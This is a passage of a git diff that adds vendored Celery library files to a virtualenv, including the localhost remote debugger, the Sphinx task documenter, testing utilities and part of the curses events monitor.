to. Default is '127.0.0.1' (only accessible from + localhost). + +.. envvar:: CELERY_RDB_PORT + +``CELERY_RDB_PORT`` +------------------- + + Base port to bind to. Default is 6899. + The debugger will try to find an available port starting from the + base port. The selected port will be logged by the worker. +""" +import errno +import os +import socket +import sys +from pdb import Pdb + +from billiard.process import current_process + +__all__ = ( + 'CELERY_RDB_HOST', 'CELERY_RDB_PORT', 'DEFAULT_PORT', + 'Rdb', 'debugger', 'set_trace', +) + +DEFAULT_PORT = 6899 + +CELERY_RDB_HOST = os.environ.get('CELERY_RDB_HOST') or '127.0.0.1' +CELERY_RDB_PORT = int(os.environ.get('CELERY_RDB_PORT') or DEFAULT_PORT) + +#: Holds the currently active debugger. +_current = [None] + +_frame = getattr(sys, '_getframe') + +NO_AVAILABLE_PORT = """\ +{self.ident}: Couldn't find an available port. + +Please specify one using the CELERY_RDB_PORT environment variable. +""" + +BANNER = """\ +{self.ident}: Ready to connect: telnet {self.host} {self.port} + +Type `exit` in session to continue. + +{self.ident}: Waiting for client... +""" + +SESSION_STARTED = '{self.ident}: Now in session with {self.remote_addr}.' +SESSION_ENDED = '{self.ident}: Session with {self.remote_addr} ended.' 
+ + +class Rdb(Pdb): + """Remote debugger.""" + + me = 'Remote Debugger' + _prev_outs = None + _sock = None + + def __init__(self, host=CELERY_RDB_HOST, port=CELERY_RDB_PORT, + port_search_limit=100, port_skew=+0, out=sys.stdout): + self.active = True + self.out = out + + self._prev_handles = sys.stdin, sys.stdout + + self._sock, this_port = self.get_avail_port( + host, port, port_search_limit, port_skew, + ) + self._sock.setblocking(1) + self._sock.listen(1) + self.ident = f'{self.me}:{this_port}' + self.host = host + self.port = this_port + self.say(BANNER.format(self=self)) + + self._client, address = self._sock.accept() + self._client.setblocking(1) + self.remote_addr = ':'.join(str(v) for v in address) + self.say(SESSION_STARTED.format(self=self)) + self._handle = sys.stdin = sys.stdout = self._client.makefile('rw') + super().__init__(completekey='tab', + stdin=self._handle, stdout=self._handle) + + def get_avail_port(self, host, port, search_limit=100, skew=+0): + try: + _, skew = current_process().name.split('-') + skew = int(skew) + except ValueError: + pass + this_port = None + for i in range(search_limit): + _sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + _sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + this_port = port + skew + i + try: + _sock.bind((host, this_port)) + except OSError as exc: + if exc.errno in [errno.EADDRINUSE, errno.EINVAL]: + continue + raise + else: + return _sock, this_port + raise Exception(NO_AVAILABLE_PORT.format(self=self)) + + def say(self, m): + print(m, file=self.out) + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + self._close_session() + + def _close_session(self): + self.stdin, self.stdout = sys.stdin, sys.stdout = self._prev_handles + if self.active: + if self._handle is not None: + self._handle.close() + if self._client is not None: + self._client.close() + if self._sock is not None: + self._sock.close() + self.active = False + self.say(SESSION_ENDED.format(self=self)) + + def do_continue(self, arg): + self._close_session() + self.set_continue() + return 1 + do_c = do_cont = do_continue + + def do_quit(self, arg): + self._close_session() + self.set_quit() + return 1 + do_q = do_exit = do_quit + + def set_quit(self): + # this raises a BdbQuit exception that we're unable to catch. + sys.settrace(None) + + +def debugger(): + """Return the current debugger instance, or create if none.""" + rdb = _current[0] + if rdb is None or not rdb.active: + rdb = _current[0] = Rdb() + return rdb + + +def set_trace(frame=None): + """Set break-point at current location, or a specified frame.""" + if frame is None: + frame = _frame().f_back + return debugger().set_trace(frame) diff --git a/env/Lib/site-packages/celery/contrib/sphinx.py b/env/Lib/site-packages/celery/contrib/sphinx.py new file mode 100644 index 00000000..a5505ff1 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/sphinx.py @@ -0,0 +1,105 @@ +"""Sphinx documentation plugin used to document tasks. + +Introduction +============ + +Usage +----- + +The Celery extension for Sphinx requires Sphinx 2.0 or later. + +Add the extension to your :file:`docs/conf.py` configuration module: + +.. code-block:: python + + extensions = (..., + 'celery.contrib.sphinx') + +If you'd like to change the prefix for tasks in reference documentation +then you can change the ``celery_task_prefix`` configuration value: + +.. 
code-block:: python + + celery_task_prefix = '(task)' # < default + +With the extension installed `autodoc` will automatically find +task decorated objects (e.g. when using the automodule directive) +and generate the correct (as well as add a ``(task)`` prefix), +and you can also refer to the tasks using `:task:proj.tasks.add` +syntax. + +Use ``.. autotask::`` to alternatively manually document a task. +""" +from inspect import signature + +from docutils import nodes +from sphinx.domains.python import PyFunction +from sphinx.ext.autodoc import FunctionDocumenter + +from celery.app.task import BaseTask + + +class TaskDocumenter(FunctionDocumenter): + """Document task definitions.""" + + objtype = 'task' + member_order = 11 + + @classmethod + def can_document_member(cls, member, membername, isattr, parent): + return isinstance(member, BaseTask) and getattr(member, '__wrapped__') + + def format_args(self): + wrapped = getattr(self.object, '__wrapped__', None) + if wrapped is not None: + sig = signature(wrapped) + if "self" in sig.parameters or "cls" in sig.parameters: + sig = sig.replace(parameters=list(sig.parameters.values())[1:]) + return str(sig) + return '' + + def document_members(self, all_members=False): + pass + + def check_module(self): + # Normally checks if *self.object* is really defined in the module + # given by *self.modname*. But since functions decorated with the @task + # decorator are instances living in the celery.local, we have to check + # the wrapped function instead. + wrapped = getattr(self.object, '__wrapped__', None) + if wrapped and getattr(wrapped, '__module__') == self.modname: + return True + return super().check_module() + + +class TaskDirective(PyFunction): + """Sphinx task directive.""" + + def get_signature_prefix(self, sig): + return [nodes.Text(self.env.config.celery_task_prefix)] + + +def autodoc_skip_member_handler(app, what, name, obj, skip, options): + """Handler for autodoc-skip-member event.""" + # Celery tasks created with the @task decorator have the property + # that *obj.__doc__* and *obj.__class__.__doc__* are equal, which + # trips up the logic in sphinx.ext.autodoc that is supposed to + # suppress repetition of class documentation in an instance of the + # class. This overrides that behavior. + if isinstance(obj, BaseTask) and getattr(obj, '__wrapped__'): + if skip: + return False + return None + + +def setup(app): + """Setup Sphinx extension.""" + app.setup_extension('sphinx.ext.autodoc') + app.add_autodocumenter(TaskDocumenter) + app.add_directive_to_domain('py', 'task', TaskDirective) + app.add_config_value('celery_task_prefix', '(task)', True) + app.connect('autodoc-skip-member', autodoc_skip_member_handler) + + return { + 'parallel_read_safe': True + } diff --git a/env/Lib/site-packages/celery/contrib/testing/__init__.py b/env/Lib/site-packages/celery/contrib/testing/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/celery/contrib/testing/app.py b/env/Lib/site-packages/celery/contrib/testing/app.py new file mode 100644 index 00000000..95ed700b --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/testing/app.py @@ -0,0 +1,112 @@ +"""Create Celery app instances used for testing.""" +import weakref +from contextlib import contextmanager +from copy import deepcopy + +from kombu.utils.imports import symbol_by_name + +from celery import Celery, _state + +#: Contains the default configuration values for the test app. 
+DEFAULT_TEST_CONFIG = { + 'worker_hijack_root_logger': False, + 'worker_log_color': False, + 'accept_content': {'json'}, + 'enable_utc': True, + 'timezone': 'UTC', + 'broker_url': 'memory://', + 'result_backend': 'cache+memory://', + 'broker_heartbeat': 0, +} + + +class Trap: + """Trap that pretends to be an app but raises an exception instead. + + This to protect from code that does not properly pass app instances, + then falls back to the current_app. + """ + + def __getattr__(self, name): + # Workaround to allow unittest.mock to patch this object + # in Python 3.8 and above. + if name == '_is_coroutine' or name == '__func__': + return None + print(name) + raise RuntimeError('Test depends on current_app') + + +class UnitLogging(symbol_by_name(Celery.log_cls)): + """Sets up logging for the test application.""" + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.already_setup = True + + +def TestApp(name=None, config=None, enable_logging=False, set_as_current=False, + log=UnitLogging, backend=None, broker=None, **kwargs): + """App used for testing.""" + from . import tasks # noqa + config = dict(deepcopy(DEFAULT_TEST_CONFIG), **config or {}) + if broker is not None: + config.pop('broker_url', None) + if backend is not None: + config.pop('result_backend', None) + log = None if enable_logging else log + test_app = Celery( + name or 'celery.tests', + set_as_current=set_as_current, + log=log, + broker=broker, + backend=backend, + **kwargs) + test_app.add_defaults(config) + return test_app + + +@contextmanager +def set_trap(app): + """Contextmanager that installs the trap app. + + The trap means that anything trying to use the current or default app + will raise an exception. + """ + trap = Trap() + prev_tls = _state._tls + _state.set_default_app(trap) + + class NonTLS: + current_app = trap + _state._tls = NonTLS() + + try: + yield + finally: + _state._tls = prev_tls + + +@contextmanager +def setup_default_app(app, use_trap=False): + """Setup default app for testing. + + Ensures state is clean after the test returns. + """ + prev_current_app = _state.get_current_app() + prev_default_app = _state.default_app + prev_finalizers = set(_state._on_app_finalizers) + prev_apps = weakref.WeakSet(_state._apps) + + try: + if use_trap: + with set_trap(app): + yield + else: + yield + finally: + _state.set_default_app(prev_default_app) + _state._tls.current_app = prev_current_app + if app is not prev_current_app: + app.close() + _state._on_app_finalizers = prev_finalizers + _state._apps = prev_apps diff --git a/env/Lib/site-packages/celery/contrib/testing/manager.py b/env/Lib/site-packages/celery/contrib/testing/manager.py new file mode 100644 index 00000000..23f43b16 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/testing/manager.py @@ -0,0 +1,239 @@ +"""Integration testing utilities.""" +import socket +import sys +from collections import defaultdict +from functools import partial +from itertools import count +from typing import Any, Callable, Dict, Sequence, TextIO, Tuple # noqa + +from kombu.exceptions import ContentDisallowed +from kombu.utils.functional import retry_over_time + +from celery import states +from celery.exceptions import TimeoutError +from celery.result import AsyncResult, ResultSet # noqa +from celery.utils.text import truncate +from celery.utils.time import humanize_seconds as _humanize_seconds + +E_STILL_WAITING = 'Still waiting for {0}. 
Trying again {when}: {exc!r}' + +humanize_seconds = partial(_humanize_seconds, microseconds=True) + + +class Sentinel(Exception): + """Signifies the end of something.""" + + +class ManagerMixin: + """Mixin that adds :class:`Manager` capabilities.""" + + def _init_manager(self, + block_timeout=30 * 60.0, no_join=False, + stdout=None, stderr=None): + # type: (float, bool, TextIO, TextIO) -> None + self.stdout = sys.stdout if stdout is None else stdout + self.stderr = sys.stderr if stderr is None else stderr + self.connerrors = self.app.connection().recoverable_connection_errors + self.block_timeout = block_timeout + self.no_join = no_join + + def remark(self, s, sep='-'): + # type: (str, str) -> None + print(f'{sep}{s}', file=self.stdout) + + def missing_results(self, r): + # type: (Sequence[AsyncResult]) -> Sequence[str] + return [res.id for res in r if res.id not in res.backend._cache] + + def wait_for( + self, + fun, # type: Callable + catch, # type: Sequence[Any] + desc="thing", # type: str + args=(), # type: Tuple + kwargs=None, # type: Dict + errback=None, # type: Callable + max_retries=10, # type: int + interval_start=0.1, # type: float + interval_step=0.5, # type: float + interval_max=5.0, # type: float + emit_warning=False, # type: bool + **options # type: Any + ): + # type: (...) -> Any + """Wait for event to happen. + + The `catch` argument specifies the exception that means the event + has not happened yet. + """ + kwargs = {} if not kwargs else kwargs + + def on_error(exc, intervals, retries): + interval = next(intervals) + if emit_warning: + self.warn(E_STILL_WAITING.format( + desc, when=humanize_seconds(interval, 'in', ' '), exc=exc, + )) + if errback: + errback(exc, interval, retries) + return interval + + return self.retry_over_time( + fun, catch, + args=args, kwargs=kwargs, + errback=on_error, max_retries=max_retries, + interval_start=interval_start, interval_step=interval_step, + **options + ) + + def ensure_not_for_a_while(self, fun, catch, + desc='thing', max_retries=20, + interval_start=0.1, interval_step=0.02, + interval_max=1.0, emit_warning=False, + **options): + """Make sure something does not happen (at least for a while).""" + try: + return self.wait_for( + fun, catch, desc=desc, max_retries=max_retries, + interval_start=interval_start, interval_step=interval_step, + interval_max=interval_max, emit_warning=emit_warning, + ) + except catch: + pass + else: + raise AssertionError(f'Should not have happened: {desc}') + + def retry_over_time(self, *args, **kwargs): + return retry_over_time(*args, **kwargs) + + def join(self, r, propagate=False, max_retries=10, **kwargs): + if self.no_join: + return + if not isinstance(r, ResultSet): + r = self.app.ResultSet([r]) + received = [] + + def on_result(task_id, value): + received.append(task_id) + + for i in range(max_retries) if max_retries else count(0): + received[:] = [] + try: + return r.get(callback=on_result, propagate=propagate, **kwargs) + except (socket.timeout, TimeoutError) as exc: + waiting_for = self.missing_results(r) + self.remark( + 'Still waiting for {}/{}: [{}]: {!r}'.format( + len(r) - len(received), len(r), + truncate(', '.join(waiting_for)), exc), '!', + ) + except self.connerrors as exc: + self.remark(f'join: connection lost: {exc!r}', '!') + raise AssertionError('Test failed: Missing task results') + + def inspect(self, timeout=3.0): + return self.app.control.inspect(timeout=timeout) + + def query_tasks(self, ids, timeout=0.5): + tasks = self.inspect(timeout).query_task(*ids) or {} + yield from 
tasks.items() + + def query_task_states(self, ids, timeout=0.5): + states = defaultdict(set) + for hostname, reply in self.query_tasks(ids, timeout=timeout): + for task_id, (state, _) in reply.items(): + states[state].add(task_id) + return states + + def assert_accepted(self, ids, interval=0.5, + desc='waiting for tasks to be accepted', **policy): + return self.assert_task_worker_state( + self.is_accepted, ids, interval=interval, desc=desc, **policy + ) + + def assert_received(self, ids, interval=0.5, + desc='waiting for tasks to be received', **policy): + return self.assert_task_worker_state( + self.is_received, ids, interval=interval, desc=desc, **policy + ) + + def assert_result_tasks_in_progress_or_completed( + self, + async_results, + interval=0.5, + desc='waiting for tasks to be started or completed', + **policy + ): + return self.assert_task_state_from_result( + self.is_result_task_in_progress, + async_results, + interval=interval, desc=desc, **policy + ) + + def assert_task_state_from_result(self, fun, results, + interval=0.5, **policy): + return self.wait_for( + partial(self.true_or_raise, fun, results, timeout=interval), + (Sentinel,), **policy + ) + + @staticmethod + def is_result_task_in_progress(results, **kwargs): + possible_states = (states.STARTED, states.SUCCESS) + return all(result.state in possible_states for result in results) + + def assert_task_worker_state(self, fun, ids, interval=0.5, **policy): + return self.wait_for( + partial(self.true_or_raise, fun, ids, timeout=interval), + (Sentinel,), **policy + ) + + def is_received(self, ids, **kwargs): + return self._ids_matches_state( + ['reserved', 'active', 'ready'], ids, **kwargs) + + def is_accepted(self, ids, **kwargs): + return self._ids_matches_state(['active', 'ready'], ids, **kwargs) + + def _ids_matches_state(self, expected_states, ids, timeout=0.5): + states = self.query_task_states(ids, timeout=timeout) + return all( + any(t in s for s in [states[k] for k in expected_states]) + for t in ids + ) + + def true_or_raise(self, fun, *args, **kwargs): + res = fun(*args, **kwargs) + if not res: + raise Sentinel() + return res + + def wait_until_idle(self): + control = self.app.control + with self.app.connection() as connection: + # Try to purge the queue before we start + # to attempt to avoid interference from other tests + while True: + count = control.purge(connection=connection) + if count == 0: + break + + # Wait until worker is idle + inspect = control.inspect() + inspect.connection = connection + while True: + try: + count = sum(len(t) for t in inspect.active().values()) + except ContentDisallowed: + # test_security_task_done may trigger this exception + break + if count == 0: + break + + +class Manager(ManagerMixin): + """Test helpers for task integration tests.""" + + def __init__(self, app, **kwargs): + self.app = app + self._init_manager(**kwargs) diff --git a/env/Lib/site-packages/celery/contrib/testing/mocks.py b/env/Lib/site-packages/celery/contrib/testing/mocks.py new file mode 100644 index 00000000..4ec79145 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/testing/mocks.py @@ -0,0 +1,137 @@ +"""Useful mocks for unit testing.""" +import numbers +from datetime import datetime, timedelta +from typing import Any, Mapping, Sequence # noqa +from unittest.mock import Mock + +from celery import Celery # noqa +from celery.canvas import Signature # noqa + + +def TaskMessage( + name, # type: str + id=None, # type: str + args=(), # type: Sequence + kwargs=None, # type: Mapping + callbacks=None, # type: 
Sequence[Signature] + errbacks=None, # type: Sequence[Signature] + chain=None, # type: Sequence[Signature] + shadow=None, # type: str + utc=None, # type: bool + **options # type: Any +): + # type: (...) -> Any + """Create task message in protocol 2 format.""" + kwargs = {} if not kwargs else kwargs + from kombu.serialization import dumps + + from celery import uuid + id = id or uuid() + message = Mock(name=f'TaskMessage-{id}') + message.headers = { + 'id': id, + 'task': name, + 'shadow': shadow, + } + embed = {'callbacks': callbacks, 'errbacks': errbacks, 'chain': chain} + message.headers.update(options) + message.content_type, message.content_encoding, message.body = dumps( + (args, kwargs, embed), serializer='json', + ) + message.payload = (args, kwargs, embed) + return message + + +def TaskMessage1( + name, # type: str + id=None, # type: str + args=(), # type: Sequence + kwargs=None, # type: Mapping + callbacks=None, # type: Sequence[Signature] + errbacks=None, # type: Sequence[Signature] + chain=None, # type: Sequence[Signature] + **options # type: Any +): + # type: (...) -> Any + """Create task message in protocol 1 format.""" + kwargs = {} if not kwargs else kwargs + from kombu.serialization import dumps + + from celery import uuid + id = id or uuid() + message = Mock(name=f'TaskMessage-{id}') + message.headers = {} + message.payload = { + 'task': name, + 'id': id, + 'args': args, + 'kwargs': kwargs, + 'callbacks': callbacks, + 'errbacks': errbacks, + } + message.payload.update(options) + message.content_type, message.content_encoding, message.body = dumps( + message.payload, + ) + return message + + +def task_message_from_sig(app, sig, utc=True, TaskMessage=TaskMessage): + # type: (Celery, Signature, bool, Any) -> Any + """Create task message from :class:`celery.Signature`. + + Example: + >>> m = task_message_from_sig(app, add.s(2, 2)) + >>> amqp_client.basic_publish(m, exchange='ex', routing_key='rkey') + """ + sig.freeze() + callbacks = sig.options.pop('link', None) + errbacks = sig.options.pop('link_error', None) + countdown = sig.options.pop('countdown', None) + if countdown: + eta = app.now() + timedelta(seconds=countdown) + else: + eta = sig.options.pop('eta', None) + if eta and isinstance(eta, datetime): + eta = eta.isoformat() + expires = sig.options.pop('expires', None) + if expires and isinstance(expires, numbers.Real): + expires = app.now() + timedelta(seconds=expires) + if expires and isinstance(expires, datetime): + expires = expires.isoformat() + return TaskMessage( + sig.task, id=sig.id, args=sig.args, + kwargs=sig.kwargs, + callbacks=[dict(s) for s in callbacks] if callbacks else None, + errbacks=[dict(s) for s in errbacks] if errbacks else None, + eta=eta, + expires=expires, + utc=utc, + **sig.options + ) + + +class _ContextMock(Mock): + """Dummy class implementing __enter__ and __exit__. + + The :keyword:`with` statement requires these to be implemented + in the class, not just the instance. + """ + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + pass + + +def ContextMock(*args, **kwargs): + """Mock that mocks :keyword:`with` statement contexts.""" + obj = _ContextMock(*args, **kwargs) + obj.attach_mock(_ContextMock(), '__enter__') + obj.attach_mock(_ContextMock(), '__exit__') + obj.__enter__.return_value = obj + # if __exit__ return a value the exception is ignored, + # so it must return None here. 
+ obj.__exit__.return_value = None + return obj diff --git a/env/Lib/site-packages/celery/contrib/testing/tasks.py b/env/Lib/site-packages/celery/contrib/testing/tasks.py new file mode 100644 index 00000000..a372a20f --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/testing/tasks.py @@ -0,0 +1,9 @@ +"""Helper tasks for integration tests.""" +from celery import shared_task + + +@shared_task(name='celery.ping') +def ping(): + # type: () -> str + """Simple task that just returns 'pong'.""" + return 'pong' diff --git a/env/Lib/site-packages/celery/contrib/testing/worker.py b/env/Lib/site-packages/celery/contrib/testing/worker.py new file mode 100644 index 00000000..fa8f6889 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/testing/worker.py @@ -0,0 +1,221 @@ +"""Embedded workers for integration tests.""" +import logging +import os +import threading +from contextlib import contextmanager +from typing import Any, Iterable, Union # noqa + +import celery.worker.consumer # noqa +from celery import Celery, worker # noqa +from celery.result import _set_task_join_will_block, allow_join_result +from celery.utils.dispatch import Signal +from celery.utils.nodenames import anon_nodename + +WORKER_LOGLEVEL = os.environ.get('WORKER_LOGLEVEL', 'error') + +test_worker_starting = Signal( + name='test_worker_starting', + providing_args={}, +) +test_worker_started = Signal( + name='test_worker_started', + providing_args={'worker', 'consumer'}, +) +test_worker_stopped = Signal( + name='test_worker_stopped', + providing_args={'worker'}, +) + + +class TestWorkController(worker.WorkController): + """Worker that can synchronize on being fully started.""" + + logger_queue = None + + def __init__(self, *args, **kwargs): + # type: (*Any, **Any) -> None + self._on_started = threading.Event() + + super().__init__(*args, **kwargs) + + if self.pool_cls.__module__.split('.')[-1] == 'prefork': + from billiard import Queue + self.logger_queue = Queue() + self.pid = os.getpid() + + try: + from tblib import pickling_support + pickling_support.install() + except ImportError: + pass + + # collect logs from forked process. + # XXX: those logs will appear twice in the live log + self.queue_listener = logging.handlers.QueueListener(self.logger_queue, logging.getLogger()) + self.queue_listener.start() + + class QueueHandler(logging.handlers.QueueHandler): + def prepare(self, record): + record.from_queue = True + # Keep origin record. + return record + + def handleError(self, record): + if logging.raiseExceptions: + raise + + def start(self): + if self.logger_queue: + handler = self.QueueHandler(self.logger_queue) + handler.addFilter(lambda r: r.process != self.pid and not getattr(r, 'from_queue', False)) + logger = logging.getLogger() + logger.addHandler(handler) + return super().start() + + def on_consumer_ready(self, consumer): + # type: (celery.worker.consumer.Consumer) -> None + """Callback called when the Consumer blueprint is fully started.""" + self._on_started.set() + test_worker_started.send( + sender=self.app, worker=self, consumer=consumer) + + def ensure_started(self): + # type: () -> None + """Wait for worker to be fully up and running. + + Warning: + Worker must be started within a thread for this to work, + or it will block forever. 
+ """ + self._on_started.wait() + + +@contextmanager +def start_worker( + app, # type: Celery + concurrency=1, # type: int + pool='solo', # type: str + loglevel=WORKER_LOGLEVEL, # type: Union[str, int] + logfile=None, # type: str + perform_ping_check=True, # type: bool + ping_task_timeout=10.0, # type: float + shutdown_timeout=10.0, # type: float + **kwargs # type: Any +): + # type: (...) -> Iterable + """Start embedded worker. + + Yields: + celery.app.worker.Worker: worker instance. + """ + test_worker_starting.send(sender=app) + + worker = None + try: + with _start_worker_thread(app, + concurrency=concurrency, + pool=pool, + loglevel=loglevel, + logfile=logfile, + perform_ping_check=perform_ping_check, + shutdown_timeout=shutdown_timeout, + **kwargs) as worker: + if perform_ping_check: + from .tasks import ping + with allow_join_result(): + assert ping.delay().get(timeout=ping_task_timeout) == 'pong' + + yield worker + finally: + test_worker_stopped.send(sender=app, worker=worker) + + +@contextmanager +def _start_worker_thread(app, + concurrency=1, + pool='solo', + loglevel=WORKER_LOGLEVEL, + logfile=None, + WorkController=TestWorkController, + perform_ping_check=True, + shutdown_timeout=10.0, + **kwargs): + # type: (Celery, int, str, Union[str, int], str, Any, **Any) -> Iterable + """Start Celery worker in a thread. + + Yields: + celery.worker.Worker: worker instance. + """ + setup_app_for_worker(app, loglevel, logfile) + if perform_ping_check: + assert 'celery.ping' in app.tasks + # Make sure we can connect to the broker + with app.connection(hostname=os.environ.get('TEST_BROKER')) as conn: + conn.default_channel.queue_declare + + worker = WorkController( + app=app, + concurrency=concurrency, + hostname=anon_nodename(), + pool=pool, + loglevel=loglevel, + logfile=logfile, + # not allowed to override TestWorkController.on_consumer_ready + ready_callback=None, + without_heartbeat=kwargs.pop("without_heartbeat", True), + without_mingle=True, + without_gossip=True, + **kwargs) + + t = threading.Thread(target=worker.start, daemon=True) + t.start() + worker.ensure_started() + _set_task_join_will_block(False) + + try: + yield worker + finally: + from celery.worker import state + state.should_terminate = 0 + t.join(shutdown_timeout) + if t.is_alive(): + raise RuntimeError( + "Worker thread failed to exit within the allocated timeout. " + "Consider raising `shutdown_timeout` if your tasks take longer " + "to execute." + ) + state.should_terminate = None + + +@contextmanager +def _start_worker_process(app, + concurrency=1, + pool='solo', + loglevel=WORKER_LOGLEVEL, + logfile=None, + **kwargs): + # type (Celery, int, str, Union[int, str], str, **Any) -> Iterable + """Start worker in separate process. + + Yields: + celery.app.worker.Worker: worker instance. 
+ """ + from celery.apps.multi import Cluster, Node + + app.set_current() + cluster = Cluster([Node('testworker1@%h')]) + cluster.start() + try: + yield + finally: + cluster.stopwait() + + +def setup_app_for_worker(app, loglevel, logfile) -> None: + # type: (Celery, Union[str, int], str) -> None + """Setup the app to be used for starting an embedded worker.""" + app.finalize() + app.set_current() + app.set_default() + type(app.log)._setup = False + app.log.setup(loglevel=loglevel, logfile=logfile) diff --git a/env/Lib/site-packages/celery/events/__init__.py b/env/Lib/site-packages/celery/events/__init__.py new file mode 100644 index 00000000..8e509fb7 --- /dev/null +++ b/env/Lib/site-packages/celery/events/__init__.py @@ -0,0 +1,15 @@ +"""Monitoring Event Receiver+Dispatcher. + +Events is a stream of messages sent for certain actions occurring +in the worker (and clients if :setting:`task_send_sent_event` +is enabled), used for monitoring purposes. +""" + +from .dispatcher import EventDispatcher +from .event import Event, event_exchange, get_exchange, group_from +from .receiver import EventReceiver + +__all__ = ( + 'Event', 'EventDispatcher', 'EventReceiver', + 'event_exchange', 'get_exchange', 'group_from', +) diff --git a/env/Lib/site-packages/celery/events/cursesmon.py b/env/Lib/site-packages/celery/events/cursesmon.py new file mode 100644 index 00000000..cff26bef --- /dev/null +++ b/env/Lib/site-packages/celery/events/cursesmon.py @@ -0,0 +1,534 @@ +"""Graphical monitor of Celery events using curses.""" + +import curses +import sys +import threading +from datetime import datetime +from itertools import count +from math import ceil +from textwrap import wrap +from time import time + +from celery import VERSION_BANNER, states +from celery.app import app_or_default +from celery.utils.text import abbr, abbrtask + +__all__ = ('CursesMonitor', 'evtop') + +BORDER_SPACING = 4 +LEFT_BORDER_OFFSET = 3 +UUID_WIDTH = 36 +STATE_WIDTH = 8 +TIMESTAMP_WIDTH = 8 +MIN_WORKER_WIDTH = 15 +MIN_TASK_WIDTH = 16 + +# this module is considered experimental +# we don't care about coverage. 
+ +STATUS_SCREEN = """\ +events: {s.event_count} tasks:{s.task_count} workers:{w_alive}/{w_all} +""" + + +class CursesMonitor: # pragma: no cover + """A curses based Celery task monitor.""" + + keymap = {} + win = None + screen_delay = 10 + selected_task = None + selected_position = 0 + selected_str = 'Selected: ' + foreground = curses.COLOR_BLACK + background = curses.COLOR_WHITE + online_str = 'Workers online: ' + help_title = 'Keys: ' + help = ('j:down k:up i:info t:traceback r:result c:revoke ^c: quit') + greet = f'celery events {VERSION_BANNER}' + info_str = 'Info: ' + + def __init__(self, state, app, keymap=None): + self.app = app + self.keymap = keymap or self.keymap + self.state = state + default_keymap = { + 'J': self.move_selection_down, + 'K': self.move_selection_up, + 'C': self.revoke_selection, + 'T': self.selection_traceback, + 'R': self.selection_result, + 'I': self.selection_info, + 'L': self.selection_rate_limit, + } + self.keymap = dict(default_keymap, **self.keymap) + self.lock = threading.RLock() + + def format_row(self, uuid, task, worker, timestamp, state): + mx = self.display_width + + # include spacing + detail_width = mx - 1 - STATE_WIDTH - 1 - TIMESTAMP_WIDTH + uuid_space = detail_width - 1 - MIN_TASK_WIDTH - 1 - MIN_WORKER_WIDTH + + if uuid_space < UUID_WIDTH: + uuid_width = uuid_space + else: + uuid_width = UUID_WIDTH + + detail_width = detail_width - uuid_width - 1 + task_width = int(ceil(detail_width / 2.0)) + worker_width = detail_width - task_width - 1 + + uuid = abbr(uuid, uuid_width).ljust(uuid_width) + worker = abbr(worker, worker_width).ljust(worker_width) + task = abbrtask(task, task_width).ljust(task_width) + state = abbr(state, STATE_WIDTH).ljust(STATE_WIDTH) + timestamp = timestamp.ljust(TIMESTAMP_WIDTH) + + row = f'{uuid} {worker} {task} {timestamp} {state} ' + if self.screen_width is None: + self.screen_width = len(row[:mx]) + return row[:mx] + + @property + def screen_width(self): + _, mx = self.win.getmaxyx() + return mx + + @property + def screen_height(self): + my, _ = self.win.getmaxyx() + return my + + @property + def display_width(self): + _, mx = self.win.getmaxyx() + return mx - BORDER_SPACING + + @property + def display_height(self): + my, _ = self.win.getmaxyx() + return my - 10 + + @property + def limit(self): + return self.display_height + + def find_position(self): + if not self.tasks: + return 0 + for i, e in enumerate(self.tasks): + if self.selected_task == e[0]: + return i + return 0 + + def move_selection_up(self): + self.move_selection(-1) + + def move_selection_down(self): + self.move_selection(1) + + def move_selection(self, direction=1): + if not self.tasks: + return + pos = self.find_position() + try: + self.selected_task = self.tasks[pos + direction][0] + except IndexError: + self.selected_task = self.tasks[0][0] + + keyalias = {curses.KEY_DOWN: 'J', + curses.KEY_UP: 'K', + curses.KEY_ENTER: 'I'} + + def handle_keypress(self): + try: + key = self.win.getkey().upper() + except Exception: # pylint: disable=broad-except + return + key = self.keyalias.get(key) or key + handler = self.keymap.get(key) + if handler is not None: + handler() + + def alert(self, callback, title=None): + self.win.erase() + my, mx = self.win.getmaxyx() + y = blank_line = count(2) + if title: + self.win.addstr(next(y), 3, title, + curses.A_BOLD | curses.A_UNDERLINE) + next(blank_line) + callback(my, mx, next(y)) + self.win.addstr(my - 1, 0, 'Press any key to continue...', + curses.A_BOLD) + self.win.refresh() + while 1: + try: + return 
self.win.getkey().upper() + except Exception: # pylint: disable=broad-except + pass + + def selection_rate_limit(self): + if not self.selected_task: + return curses.beep() + task = self.state.tasks[self.selected_task] + if not task.name: + return curses.beep() + + my, mx = self.win.getmaxyx() + r = 'New rate limit: ' + self.win.addstr(my - 2, 3, r, curses.A_BOLD | curses.A_UNDERLINE) + self.win.addstr(my - 2, len(r) + 3, ' ' * (mx - len(r))) + rlimit = self.readline(my - 2, 3 + len(r)) + + if rlimit: + reply = self.app.control.rate_limit(task.name, + rlimit.strip(), reply=True) + self.alert_remote_control_reply(reply) + + def alert_remote_control_reply(self, reply): + + def callback(my, mx, xs): + y = count(xs) + if not reply: + self.win.addstr( + next(y), 3, 'No replies received in 1s deadline.', + curses.A_BOLD + curses.color_pair(2), + ) + return + + for subreply in reply: + curline = next(y) + + host, response = next(subreply.items()) + host = f'{host}: ' + self.win.addstr(curline, 3, host, curses.A_BOLD) + attr = curses.A_NORMAL + text = '' + if 'error' in response: + text = response['error'] + attr |= curses.color_pair(2) + elif 'ok' in response: + text = response['ok'] + attr |= curses.color_pair(3) + self.win.addstr(curline, 3 + len(host), text, attr) + + return self.alert(callback, 'Remote Control Command Replies') + + def readline(self, x, y): + buffer = '' + curses.echo() + try: + i = 0 + while 1: + ch = self.win.getch(x, y + i) + if ch != -1: + if ch in (10, curses.KEY_ENTER): # enter + break + if ch in (27,): + buffer = '' + break + buffer += chr(ch) + i += 1 + finally: + curses.noecho() + return buffer + + def revoke_selection(self): + if not self.selected_task: + return curses.beep() + reply = self.app.control.revoke(self.selected_task, reply=True) + self.alert_remote_control_reply(reply) 